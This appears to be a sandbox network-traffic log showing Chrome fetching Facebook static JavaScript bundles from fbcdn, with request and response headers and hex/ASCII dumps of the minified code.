                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 75 35 39 46 6c 6e 37 34 69 55 79 4b 46 79 42 58 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 37 38 39 31 61 34 37 33 37 33 31 35 38 38 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: u59Fln74iUyKFyBX.3Context: e7891a473731588b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6c 4e 6a 31 65 6e 6e 50 72 55 53 63 56 48 37 74 48 79 69 46 46 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                  Data Ascii: MS-CV: lNj1ennPrUScVH7tHyiFFA.0Payload parsing failed.


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  69192.168.2.649797157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC581OUTGET /rsrc.php/v3/yQ/r/WeajZf_EolU.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: Ngjnb72jUa3bDnjuqnOv0Q==
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 11:51:10 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: 0so4kiqzXCFzmBC+0jKXLX9pVNka5XSv8/JpyXx5aKfHqhqw1cJqPnjKk8DnATUaSGtelLOf6ajYX40SAGXEOw==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:22 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=93, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=7, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 51589
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC15872INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 44 53 69 67 6e 61 6c 42 75 66 66 65 72 44 61 74 61 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 7b 7d 3b 62 3d 61 3b 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 53 69 67 6e 61 6c 56 61 6c 75 65 43 6f 6e 74 65 78 74 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 69 73 2e 63 6e 3d 61 7d 76 61 72 20 62 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 62 2e 67 65 74 53 69 67 6e 61 6c 56 61 6c 75 65 43 6f 6e 74 65 78 74
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("BDSignalBufferData",[],(function(a,b,c,d,e,f){"use strict";a={};b=a;f["default"]=b}),66);__d("SignalValueContext",[],(function(a,b,c,d,e,f){"use strict";a=function(){function a(a){this.cn=a}var b=a.prototype;b.getSignalValueContext
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC16384INData Raw: 6c 6c 65 63 74 53 69 67 6e 61 6c 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 21 3d 6e 75 6c 6c 3b 61 26 26 74 68 69 73 2e 70 61 75 73 65 4c 69 73 74 65 6e 65 72 73 28 29 3b 61 3d 6e 65 77 28 63 28 22 42 6f 6f 6c 65 61 6e 53 69 67 6e 61 6c 56 61 6c 75 65 54 79 70 65 22 29 29 28 44 61 74 65 2e 6e 6f 77 28 29 2c 74 68 69 73 2e 67 65 74 43 6f 6e 74 65 78 74 28 29 2c 61 29 3b 61 3d 7b 73 69 67 6e 61 6c 49 64 3a 74 68 69 73 2e 73 69 67 6e 61 6c 54 79 70 65 2c 64 61 74 61 3a 7b 76 61 6c 75 65 4f 72 45 72 72 6f 72 3a 61 7d 7d 3b 77 69 6e 64 6f 77 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 64 28 22 42 44 42 69 6f 6d 65 74 72 69 63 53 69 67 6e 61 6c 43 6f 6c 6c 65 63 74 6f 72 42 61 73 65 22 29 2e 42 49 4f 4d
                                                                                                                                                                                                                                  Data Ascii: llectSignals=function(a){a=a!=null;a&&this.pauseListeners();a=new(c("BooleanSignalValueType"))(Date.now(),this.getContext(),a);a={signalId:this.signalType,data:{valueOrError:a}};window.dispatchEvent(new CustomEvent(d("BDBiometricSignalCollectorBase").BIOM
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC16384INData Raw: 44 5f 42 55 46 46 45 52 5f 53 49 5a 45 2c 7b 73 69 7a 65 3a 61 2e 74 6f 53 74 72 69 6e 67 28 29 2c 74 79 70 65 3a 22 64 22 7d 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 67 65 74 44 79 6e 61 6d 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 64 79 6e 61 6d 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 7d 3b 62 2e 73 65 74 42 69 6f 6d 65 74 72 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3e 31 3f 74 68 69 73 2e 62 69 6f 6d 65 74 72 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 3d 61 3a 64 28 22 42 44 4f 70 65 72 61 74 69 6f 6e 4c 6f 67 48 65 6c 70 65 72 22 29 2e 6c 6f 67 45 72 72 6f 72 28 68 2c 64 28 22 42
                                                                                                                                                                                                                                  Data Ascii: D_BUFFER_SIZE,{size:a.toString(),type:"d"});return this};b.getDynamicSignalBufferSize=function(){return this.dynamicSignalBufferSize};b.setBiometricSignalBufferSize=function(a){a>1?this.biometricSignalBufferSize=a:d("BDOperationLogHelper").logError(h,d("B
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC2948INData Raw: 26 26 78 2e 67 65 74 48 65 61 72 74 62 65 61 74 49 6e 74 65 72 76 61 6c 4d 73 28 29 3e 30 26 26 28 7a 2e 63 6f 6c 6c 65 63 74 48 65 61 72 74 62 65 61 74 54 69 6d 65 73 28 71 2c 72 29 2c 70 21 3d 3d 30 26 26 28 77 69 6e 64 6f 77 2e 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 70 29 2c 64 28 22 42 44 4f 70 65 72 61 74 69 6f 6e 4c 6f 67 48 65 6c 70 65 72 22 29 2e 6c 6f 67 57 61 72 6e 69 6e 67 28 6a 2c 64 28 22 42 44 4c 6f 67 67 69 6e 67 43 6f 6e 73 74 61 6e 74 73 22 29 2e 4f 50 45 52 41 54 49 4f 4e 53 2e 48 42 5f 41 4c 52 45 41 44 59 5f 52 55 4e 4e 49 4e 47 29 29 2c 70 3d 77 69 6e 64 6f 77 2e 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 7a 2e 63 6f 6c 6c 65 63 74 48 65 61 72 74 62 65 61 74 54 69 6d 65 73 28 71 2c 72
                                                                                                                                                                                                                                  Data Ascii: &&x.getHeartbeatIntervalMs()>0&&(z.collectHeartbeatTimes(q,r),p!==0&&(window.clearInterval(p),d("BDOperationLogHelper").logWarning(j,d("BDLoggingConstants").OPERATIONS.HB_ALREADY_RUNNING)),p=window.setInterval(function(){return z.collectHeartbeatTimes(q,r


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  70192.168.2.649798157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC374OUTGET /rsrc.php/v3/yC/r/9NORmZkKZyv.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: /HmydUFwcPwAUig9l7tbMQ==
                                                                                                                                                                                                                                  Expires: Sat, 20 Sep 2025 09:58:34 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: tn3B54XRcP3OpXaT8T7swa6bWeoumqMlQ7UkHbP6ICZ+T9QJMwV2Z6qp7z5fcAb490c/GcJzDfXWZhGvyp3nHQ==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:22 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 59956
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC15873INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 43 4c 53 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 67 3d 74 79 70 65 6f 66 20 28 28 62 3d 77 69 6e 64 6f 77 2e 50 65 72 66 6f 72 6d 61 6e 63 65 4f 62 73 65 72 76 65 72 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 28 63 3d 62 2e 73 75 70 70 6f 72 74 65 64 45 6e 74 72 79 54 79 70 65 73 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 63 2e 69 6e 63 6c 75 64 65 73 29 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 77 69 6e 64 6f 77 2e 50 65 72 66 6f 72 6d 61 6e 63 65 4f 62 73 65 72 76 65 72 2e 73 75 70 70 6f 72 74 65 64 45 6e 74 72 79 54 79 70 65 73 2e 69 6e 63 6c 75 64 65 73 28 22 6c 61 79 6f 75 74 2d 73
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("CLS",[],(function(a,b,c,d,e,f){"use strict";var g=typeof ((b=window.PerformanceObserver)==null?void 0:(c=b.supportedEntryTypes)==null?void 0:c.includes)==="function"&&window.PerformanceObserver.supportedEntryTypes.includes("layout-s
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC16384INData Raw: 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 63 3d 61 2e 65 6c 65 6d 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 63 2e 63 6c 61 73 73 4e 61 6d 65 2c 65 6c 65 6d 65 6e 74 3a 28 63 3d 61 2e 65 6c 65 6d 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 63 2e 74 61 67 4e 61 6d 65 2c 73 69 7a 65 3a 61 2e 73 69 7a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 61 2e 73 74 61 72 74 54 69 6d 65 2c 75 72 6c 3a 61 2e 75 72 6c 7d 7d 7d 66 2e 67 65 74 4c 43 50 43 61 6c 6c 62 61 63 6b 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 52 65 73 6f 75 72 63 65 44 6f 77 6e 6c 6f 61 64 4c 6f 67 67 65 72 22 2c 5b 22 70 65 72 66 6f 72 6d 61 6e 63 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74
                                                                                                                                                                                                                                  Data Ascii: =null?null:{className:(c=a.element)==null?void 0:c.className,element:(c=a.element)==null?void 0:c.tagName,size:a.size,timestamp:a.startTime,url:a.url}}}f.getLCPCallback=a}),66);__d("ResourceDownloadLogger",["performance"],(function(a,b,c,d,e,f,g){"use st
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC16384INData Raw: 70 50 69 78 65 6c 73 3a 30 2c 63 73 73 42 67 45 6c 65 6d 65 6e 74 73 3a 41 72 72 61 79 2e 66 72 6f 6d 28 74 68 69 73 2e 63 73 73 42 67 45 6c 65 6d 65 6e 74 73 2e 76 61 6c 75 65 73 28 29 29 2c 65 6c 65 6d 65 6e 74 73 3a 74 68 69 73 2e 24 32 2c 66 69 6e 61 6c 53 63 72 6f 6c 6c 59 3a 74 68 69 73 2e 24 31 32 2c 69 6d 67 4e 75 6d 3a 30 2c 69 6d 67 50 69 78 65 6c 73 3a 30 2c 69 6e 69 74 69 61 6c 53 63 72 6f 6c 6c 59 3a 74 68 69 73 2e 69 6e 69 74 69 61 6c 53 63 72 6f 6c 6c 59 2c 69 6e 74 65 72 61 63 74 69 6f 6e 54 79 70 65 3a 74 68 69 73 2e 69 6e 74 65 72 61 63 74 69 6f 6e 54 79 70 65 2c 6c 6f 61 64 69 6e 67 45 6c 65 6d 65 6e 74 73 3a 74 68 69 73 2e 24 35 2c 6d 61 72 6b 65 72 50 6f 69 6e 74 73 3a 74 68 69 73 2e 6d 61 72 6b 65 72 50 6f 69 6e 74 73 2c 6e 61 76 43
                                                                                                                                                                                                                                  Data Ascii: pPixels:0,cssBgElements:Array.from(this.cssBgElements.values()),elements:this.$2,finalScrollY:this.$12,imgNum:0,imgPixels:0,initialScrollY:this.initialScrollY,interactionType:this.interactionType,loadingElements:this.$5,markerPoints:this.markerPoints,navC
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC11314INData Raw: 65 74 28 61 29 3b 69 66 28 62 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 62 2e 63 61 6c 6c 62 61 63 6b 28 29 3b 62 2e 65 78 65 63 75 74 65 4f 6e 63 65 26 26 6a 2e 24 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 54 72 61 63 69 6e 67 24 70 5f 38 5b 22 64 65 6c 65 74 65 22 5d 28 61 29 7d 29 7d 3b 64 28 22 57 65 62 41 50 49 73 22 29 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 26 26 28 6a 2e 6d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 3d 6e 65 77 28 64 28 22 57 65 62 41 50 49 73 22 29 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 29 28 6a 2e 6d 75 74 61 74 69 6f 6e 52 65 63 6f 72 64 48 61 6e 64 6c 65 72 29 29 3b 64 28 22 57 65 62 41 50 49 73 22 29 2e 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 26 26 28 6a 2e 6c 6f 61 64 69 6e
                                                                                                                                                                                                                                  Data Ascii: et(a);if(b==null)return;b.callback();b.executeOnce&&j.$VisualCompletionTracing$p_8["delete"](a)})};d("WebAPIs").MutationObserver&&(j.mutationObserver=new(d("WebAPIs").MutationObserver)(j.mutationRecordHandler));d("WebAPIs").IntersectionObserver&&(j.loadin


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  71192.168.2.649799157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC581OUTGET /rsrc.php/v3/yO/r/_tJ17sGyxOX.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: cxEZEvS096W1UB3HTVACWw==
                                                                                                                                                                                                                                  Expires: Sun, 21 Sep 2025 01:05:36 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: zrbxB9/VCE1i/ptyMUlqWBmMHnUKfUtqEnNRYzLrIJ55fzfBOvHaOCfkph55Prg727nV3EkSBuEFB6vZBHa5ew==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:22 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 18154
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC16384INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 6c 69 63 65 6e 73 65 2f 74 33 68 4f 4c 73 38 77 6c 58 79 2f 0a 20 2a 2f 0a 5f 5f 64 28 22 6a 61 76 61 73 63 72 69 70 74 2d 62 6c 6f 77 66 69 73 68 2d 31 2e 30 2e 35 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 62 3d 7b 7d 3b 76 61 72 20 67 3d 7b 65 78 70 6f 72 74 73 3a 62 7d 3b 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 74 68 69 73 2e 6b 65 79 3d 62 2c 28 63 3d 3d 3d 22 65 63 62 22 7c 7c 63 3d 3d 3d 22 63 62 63 22 29 26 26 28 74 68
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*//** * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/ */__d("javascript-blowfish-1.0.5",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){var a=function(b,c){this.key=b,(c==="ecb"||c==="cbc")&&(th
